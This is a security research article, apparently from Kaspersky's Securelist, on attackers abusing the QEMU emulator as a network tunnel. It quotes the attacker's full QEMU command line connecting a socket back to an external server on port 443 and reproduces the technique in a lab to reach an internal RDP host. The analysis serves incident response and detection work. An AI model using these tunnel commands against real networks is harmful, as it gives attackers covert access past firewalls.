https://securelist.com/network-tunneling-with-qemu/111803/ Solutions for: * Home Products * Small Business 1-50 employees * Medium Business 51-999 employees * Enterprise 1000+ employees by Kaspersky * CompanyAccount * Get In Touch * Dark mode off * English + Russian + Spanish [ ] * Solutions + o [hybrid-clo]Hybrid Cloud Security Learn More o [iot-embed-]Internet of Things & Embedded Security Learn More o [threat-man]Threat Management and Defense Learn More o [transporta]Industrial Cybersecurity Learn More o [fraud-prev]Fraud Prevention Learn More + o Other solutions o Blockchain Security o Kaspersky for Security Operations Center * Industries + o [national-c]National Cybersecurity Learn More o [industrial]Industrial Cybersecurity Learn More o [financial-]Finance Services Cybersecurity Learn More o [healthcare]Healthcare Cybersecurity Learn More o [transporta]Transportation Cybersecurity Learn More o [retail-cyb]Retail Cybersecurity Learn More + o Other Industries o Telecom Cybersecurity o Blockchain Security o View all * Products + o [endpoint-s]KasperskyEndpoint Security for Business Learn More o [endpoint-d]KasperskyEndpoint Detection and Response (EDR) Learn More o [hybrid-clo]KasperskyEDR Optimum Learn More o [anti-targe]KasperskyAnti Targeted Attack Platform Learn More o [private-se]KasperskyManaged Detection and Response Learn More o [embedded-s]KasperskySandbox Learn More + o Other Products o Kaspersky Security for Mail Server o Kaspersky Security for Internet Gateway o Kaspersky Embedded Systems Security o Kaspersky Hybrid Cloud Security for AWS o Kaspersky Hybrid Cloud Security for Azure o View All * Services + o [cybersecur]KasperskyCybersecurity Services Learn More o [security-a]KasperskyAdaptive Online Training Learn More o [premium-su]KasperskyPremium Support Learn More o [threat-int]KasperskyThreat Intelligence Learn More o [incident-r]KasperskyAPT Intelligence Reporting Learn More o [threat-hun]KasperskyTargeted Attack Discovery Learn More + o Other Services o Kaspersky Professional Services o Kaspersky Incident Response o Kaspersky Cybersecurity Training o Kaspersky Incident Communications o Kaspersky Security Awareness o View All * Resource Center + Case Studies + White Papers + Datasheets + Technologies + MITRE ATT&CK * About Us + Transparency + Corporate News + Press Center + Careers + Innovation Hub + Sponsorship + Policy Blog + Contacts * GDPR * Subscribe Dark mode off Login * Securelist menu * English + Russian + Spanish * Existing Customers + Personal o My Kaspersky o Renew your product o Update your product o Customer support + Business o KSOS portal o Kaspersky Business Hub o Technical Support o Knowledge Base o Renew License * Home + Products + Trials&Update + Resource Center * Business + Small Business (1-50 employees) + Medium Business (51-999 employees) + Enterprise (1000+ employees) * * Securelist * Threats + Financial threats + Mobile threats + Web threats + Secure environment (IoT) + Vulnerabilities and exploits + Spam and Phishing + Industrial threats * Categories + APT reports + Incidents + Research + Malware reports + Spam and phishing reports + Publications + Kaspersky Security Bulletin * Archive * All Tags * APT Logbook * Webinars * Statistics * Encyclopedia * Threats descriptions * KSB 2021 * * About Us + Company + Transparency + Corporate News + Press Center + Careers + Sponsorships + Policy Blog + Contacts * Partners + Find a Partner + Partner Program Content menu Close [ ] Subscribe by Kaspersky Dark mode off Threats Threats * APT (Targeted attacks) * Secure environment (IoT) * Mobile threats * Financial threats * Spam and phishing * Industrial threats * Web threats * Vulnerabilities and exploits Categories Categories * APT reports * Malware descriptions * Security Bulletin * Malware reports * Spam and phishing reports * Security technologies * Research * Publications Other sections * Archive * All tags * Webinars * APT Logbook * Statistics * Encyclopedia * Threats descriptions * KSB 2023 [sl-anstract-nodes-tunnel-1200-1-800x450] Research Network tunneling with... QEMU? Research 05 Mar 2024 minute read [icon-categ] [icon-categ] Table of Contents * Statistics * QEMU as a tunneling tool + user (user network stack) + hubport (virtual hub) + socket * QEMU network traffic analysis * Conclusion [sl-anstract-nodes-tunnel-1200-1-1200x600] Authors * [avatar_def] Grigory Sablin * [avatar_def] Alexander Rodchenko * [avatar_def] Kirill Magaskin Cyberattackers tend to give preference to legitimate tools when taking various attack steps, as these help them evade detection systems while keeping malware development costs down to a minimum. Network scanning, capturing a process memory dump, exfiltrating data, running files remotely, and even encrypting drives -- all these can be done with trusted software. To gain a foothold inside a compromised infrastructure and develop the attack, adversaries can use previously installed malware or connect to the network along with employees through the company's RDP servers or corporate VPN (to do this, attackers must have accounts with appropriate privileges). Another way to connect to the internal network of an attacked organization involves using utilities to set up network tunnels or forward network ports between corporate systems and the adversary's servers, which allows the attackers to bypass NAT and firewalls to gain access to internal systems. It is that category of software that we would like to discuss here. Statistics There is currently no shortage of utilities that can be used to set up a network tunnel between two systems. Some of these connect directly, while others use a proxy, which hides the IP address of the attackers' server. The following are the utilities we have come across while responding to cyberincidents in the last three years. * Stowaway * ligolo * 3proxy * dog-tunnel * chisel * FRP * ngrok * gs-netcat * plink * iox * nps The most frequently used ones were ngrok and FRP. Utilities of this type accounted for 10% of total attacks. QEMU as a tunneling tool While investigating an incident at a large company a few months ago, we detected uncommon malicious activity inside one of the systems. We ran an analysis on the artifacts, only to find that the adversary had deployed and launched the following: * The Angry IP Scanner network scanning utility * The mimikatz password, hash, and Kerberos ticket extractor, and Active Directory attack tool * The QEMU hardware emulator The first two were self-explanatory, but QEMU raised a few questions. What use would the malicious actors have for a virtualizer? We were able to retrieve the QEMU execution command line from the memory of the compromised machine. We found that it was started without a LiveCD or disk image, which is very unusual for QEMU. These were the arguments that the adversary used to run QEMU: [qemu-system-i386.exe] 1 qemu-system-i386.exe -m 1M -netdev user,id=lan,restrict=off -netdev 2 socket,id=sock,connect=:443 -netdev hubport,id=port-lan,hubid=0 3 ,netdev=lan -netdev hubport,id=port-sock,hubid=0,netdev=sock -nographic where was an external IP address. Let us take a closer look at these arguments. * -m 1M: Specifies the RAM size to allocate to the virtual machine. This was 1 MB in this case, utterly insufficient for most operating systems. * -netdev user,id=lan,restrict=off: Creates a virtual network interface with the name lan and type user, which allows the virtual machine to communicate with the outside world through the host network stack. The restrict=off option removes restrictions on inbound and outbound connections. * -netdev socket,id=sock,connect=:443: Creates a socket-type network interface with the name sock, which provides a connection to a remote server at the specified IP address and port 443. * -netdev hubport,id=port-lan,hubid=0,netdev=lan: Adds a port to the virtual hub with hubid=0, which is linked to the virtual network interface lan. * -netdev hubport,id=port-sock,hubid=0,netdev=sock: Similarly to the above, this adds one more port to the virtual hub linked to the virtual network interface sock. * -nographic: starts QEMU in non-GUI mode with console output. The IP address in the arguments grabbed our attention immediately: it was external and completely unrelated to the attacked company, so we consulted the QEMU documentation. We found that QEMU supported connections between virtual machines: the -netdev option creates network devices (backend) that can then connect to the virtual machines. Each of the numerous network devices is defined by its type and supports extra options. Below is a description of the -netdev values that were used. user (user network stack) This is the simplest way of connecting a virtual machine to a network. Traffic passes through the host network stack, and the virtual machine connects to the network as if it were a regular app on the host machine. [qemu-system-x86_64 -] 1 qemu-system-x86_64 -netdev user,id=mynet0 -device e1000,netdev= mynet0 Here, mynet0 is the network backend ID, and e1000 is a network adapter (frontend) inside the virtual machine. hubport (virtual hub) Connects several network devices similarly to a network hub. socket This connects virtual machines directly through network sockets to create VM network topologies or link VMs spun up on different hosts. # VM1 [qemu-system-x86_64 -] 1 qemu-system-x86_64 -netdev socket,id=mynet3,listen=:1234 -device e1000,netdev=mynet3 # VM2, connected to VM1 [qemu-system-x86_64 -] 1 qemu-system-x86_64 -netdev socket,id=mynet4,connect=127.0.0.1:1234 2 -device e1000,netdev=mynet4 VM1 listens on port 1234, while VM2 connects to that port. This was the route the attackers took: they launched a "client" in the compromised system and had it connect to their server to open access to the corporate network where the "client" was running. It had next to no effect on the performance of the compromised system, as the adversary was using neither a disk image nor a LiveCD when running QEMU. We had no way of reliably determining how the attackers ran QEMU on their own server, so we decided to test the technique described above on a bed consisting of three systems: * InternalHost was located inside the network, with no internet access and running an RDP server on port 3389. It simulated the isolated system without access to the internet. * PivotHost was located inside the network, but it had internet access. It simulated the system that had been breached by the attackers and used for reaching InternalHost. * AttackerServer was hosted in the cloud, and it simulated the adversary's server. Our aim was to reach InternalHost from AttackerServer. The image below shows the general layout of the tunnel. Network tunnel diagram Network tunnel diagram We used QEMU on AttackerServer to spin up a VM from a Kali Linux LiveCD. A socket-type network device connected to the VM as a network adapter and listened on port 443. [qemu-system-x86_64 -] qemu-system-x86_64 -boot d -cdrom kali-linux-2023.3-live-amd64.iso 1 -m 6048 -device 2 e1000,netdev=n1,mac=52:54:00:12:34:56 -smp 2 -netdev socket,id=n1, listen=:443 Another copy of QEMU was running on PivotHost and connecting through the socket network device to port 443 on AttackerServer in the cloud. We also connected a user-type network device, combined with socket through a hub. The QEMU startup options we used were similar to those previously used by the adversary. [qemu-system-i386.exe] qemu-system-i386.exe -m 1M -netdev user,id=lan,restrict=off -netdev 1 socket,id=sock,connect=:443 -netdev hubport,id=port 2 - 3 lan,hubid=0,netdev=lan -netdev hubport,id=port-sock,hubid=0,netdev= sock -nographic Once started, QEMU set up a network tunnel from PivotHost to AttackerServer, or more precisely, to the Kali Linux VM. Kali Linux could scan the subnet to which PivotHost was connected for other systems. Subnet scan output Subnet scan output The scan located InternalHost, with the IP address 192.168.56.109. The Nmap utility showed that port 3389 was open. We tried connecting to InternalHost using RDP. Successful RDP connection to InternalHost Successful RDP connection to InternalHost Thus, we were able to ascertain that this technique for achieving network access was indeed effective. In addition to the aforementioned types of network devices, QEMU supports several others, which can also be employed by malicious actors. QEMU network traffic analysis QEMU does not use any extra encryption when tunneling traffic. It transmits encapsulated packets unencrypted: the application-level packet data sent to the server contains the size of the encapsulated Ethernet frame (4 bytes, outlined in yellow in the image below), followed by the Ethernet frame itself (outlined in red). Example of an encapsulated Ethernet frame Example of an encapsulated Ethernet frame Example of an encapsulated Ethernet frame The size of the encapsulated Ethernet frame in the image above is 89 (0x59) bytes. That value is immediately followed by the encapsulated Ethernet frame. Having a traffic dump, which had been intercepted on PivotHost in that case, we could obtain the encapsulated traffic by removing the first 58 bytes (for TCP: 14 bytes for Ethernet + 20 bytes for IP + 20 bytes for TCP headers + 4 for internal packet size). This could be done with the editcap utility from the Wireshark package after removing all packets that contained no encapsulated traffic from the PCAP file. [editcap.exe -L -C 58] 1 editcap.exe -L -C 58 original.pcap extracted_traffic.pcap The result was a PCAP file containing the traffic that had been sent through the tunnel. Original packet transmitted through the tunnel Original packet transmitted through the tunnel Original packet transmitted through the tunnel Conclusion Malicious actors using legitimate tools to perform various attack steps is nothing new to incident response professionals. Yet we have to admit that attackers sometimes come up with ingenious applications for unlikely software, as was the case with QEMU. This further supports the concept of multi-level protection, which covers both reliable endpoint protection, and specialized solutions for detecting and protecting against complex and targeted attacks including human-operated ones. Only comprehensive security that includes 24/7 network (NDR, NGFW) and endpoint (EDR, EPP) monitoring, by SOC experts for one, can detect anomalies in a timely manner and block an attack in its initial stage. Our MDR service is already capable of detecting the kind of suspicious QEMU activity in question, and appropriate IDS rules have been added to the KATA platform with the verdict Backdoor.Agent.QEMU.C&C. * Malware Technologies * RDP * Virtualization Authors * [avatar_def] Grigory Sablin * [avatar_def] Alexander Rodchenko * [avatar_def] Kirill Magaskin Network tunneling with... QEMU? Your email address will not be published. Required fields are marked * [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] Name * [ ] Email * [ ] [Submit Comment] [Comment]Cancel [ ] [ ] [ ] [ ] [ ] [ ] [ ] D[ ] [icon-categ] [icon-categ] Table of Contents * Statistics * QEMU as a tunneling tool + user (user network stack) + hubport (virtual hub) + socket * QEMU network traffic analysis * Conclusion GReAT webinars 13 May 2021, 1:00pm GReAT Ideas. Balalaika Edition * Boris Larin * Denis Legezo 26 Feb 2021, 12:00pm GReAT Ideas. Green Tea Edition * John Hultquist * Brian Bartholomew * Suguru Ishimaru * Vitaly Kamluk * Seongsu Park * Yusuke Niwa * Motohiko Sato 17 Jun 2020, 1:00pm GReAT Ideas. Powered by SAS: malware attribution and next-gen IoT honeypots * Marco Preuss * Denis Legezo * Costin Raiu * Kurt Baumgartner * Dan Demeter * Yaroslav Shmelev 26 Aug 2020, 2:00pm GReAT Ideas. Powered by SAS: threat actors advance on new fronts * Ivan Kwiatkowski * Maher Yamout * Noushin Shabab * Pierre Delcher * Felix Aime * Giampaolo Dedola * Santiago Pontiroli 22 Jul 2020, 2:00pm GReAT Ideas. Powered by SAS: threat hunting and new techniques * Dmitry Bestuzhev * Costin Raiu * Pierre Delcher * Brian Bartholomew * Boris Larin * Ariel Jungheit * Fabio Assolini From the same authors [abstract_threat_actor_attribution-800x450] Anomaly detection in certificate-based TGT requests [sl_remote_bruteforce_attacks-800x450] Detection evasion in CLR and tips on how to detect such attacks Subscribe to our weekly e-mails The hottest research right in your inbox * Email* [ ] * * * + [ ] I agree to provide my email address to "AO Kaspersky Lab" to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the "unsubscribe" link that I find at the bottom of any e-mail sent to me for the purposes mentioned above. Subscribe [ ] [ ] [ ] [ ] [ ] [ ] [ ] D[ ] In the same category [robot_toy_solid_blue_background_cyberpunk_danger_sl-800x450] An educational robot security research [sl-icons-malware-bug-caught-800x450] A lightweight method to detect potential iOS malware [sl-featured_Triangulation-hardware-800x450] Operation Triangulation: The last (hardware) mystery [Windows-CLFS-five-exploits-ransomware_CVE-2023-23376_featured-800x450] Windows CLFS and five exploits used by ransomware operators (Exploit #4 - CVE-2023-23376) [Windows-CLFS-five-exploits-ransomware_October-2022_featured-800x450] Windows CLFS and five exploits used by ransomware operators (Exploit #3 - October 2022) [Threat-Intelligence_banner_310x420_EN] Latest Posts [sl-featured-coyote-banking-trojan-800x450] Malware descriptions Coyote: A multi-stage banking Trojan abusing the Squirrel installer * GReAT [ksb-ics-predictions-2024-featured-800x450] Kaspersky Security Bulletin ICS and OT threat predictions for 2024 * Evgeny Goncharov [ksb-privacy-predictions-featured-800x450] Kaspersky Security Bulletin Privacy predictions for 2024 * Anna Larkina * Vladislav Tushkanov * Dmitry Momotov [sl-hacker-binary-bitcoin-stealer-1200-800x450] Malware descriptions Cracked software beats gold: new macOS backdoor stealing cryptowallets * Sergey Puzan Latest Webinars [Future-AI-in-cybersecurity-2024_card-800x450] Technologies and services 11 Dec 2023, 4:00pm 60 min The Future of AI in cybersecurity: what to expect in 2024 * Vladimir Dashchenko * Victor Sergeev * Vladislav Tushkanov * Dennis Kipker [Responding-to-a-data-breach_webinar_card_hd-800x450] Threat intelligence and IR 30 Nov 2023, 4:00pm 70 min Responding to a data breach: a step-by-step guide * Anna Pavlovskaya [2024-APT-Predictions_webinar_card] Cyberthreat talks 14 Nov 2023, 4:00pm 60 min 2024 Advanced persistent threat predictions * Igor Kuznetsov * David Emm * Marc Rivero * Dan Demeter * Sherif Magdy [Modern-car-compromise-techniques-and-protection_webinar_2023_card] Cyberthreat talks 09 Nov 2023, 5:00pm 60 min Overview of modern car compromise techniques and methods of protection * Alexander Kozlov * Sergey Anufrienko Reports HrServ - Previously unknown web shell used in APT attack In this report Kaspersky researchers provide an analysis of the previously unknown HrServ web shell, which exhibits both APT and crimeware features and has likely been active since 2021. Modern Asian APT groups' tactics, techniques and procedures (TTPs) Asian APT groups target various organizations from a multitude of regions and industries. We created this report to provide the cybersecurity community with the best-prepared intelligence data to effectively counteract Asian APT groups. A cascade of compromise: unveiling Lazarus' new campaign We unveil a Lazarus campaign exploiting security company products and examine its intricate connections with other campaigns How to catch a wild triangle How Kaspersky researchers obtained all stages of the Operation Triangulation campaign targeting iPhones and iPads, including zero-day exploits, validators, TriangleDB implant and additional modules. [Operation-] Subscribe to our weekly e-mails The hottest research right in your inbox * Email* [ ] * * * + [ ] I agree to provide my email address to "AO Kaspersky Lab" to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the "unsubscribe" link that I find at the bottom of any e-mail sent to me for the purposes mentioned above. Subscribe [ ] [ ] [ ] [ ] [ ] [ ] [ ] D[ ] [Operation-] Threats Threats * APT (Targeted attacks) * Secure environment (IoT) * Mobile threats * Financial threats * Spam and phishing * Industrial threats * Web threats * Vulnerabilities and exploits Categories Categories * APT reports * Malware descriptions * Security Bulletin * Malware reports * Spam and phishing reports * Security technologies * Research * Publications Other sections * Archive * All tags * Webinars * APT Logbook * Statistics * Encyclopedia * Threats descriptions * KSB 2023 (c) 2024 AO Kaspersky Lab. All Rights Reserved. Registered trademarks and service marks are the property of their respective owners. * Privacy Policy * License Agreement * Cookies Subscribe to our weekly e-mails The hottest research right in your inbox * Email* [ ] * * * + [ ] I agree to provide my email address to "AO Kaspersky Lab" to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the "unsubscribe" link that I find at the bottom of any e-mail sent to me for the purposes mentioned above. Subscribe [ ] [ ] [ ] [ ] [ ] [ ] [ ] D[ ]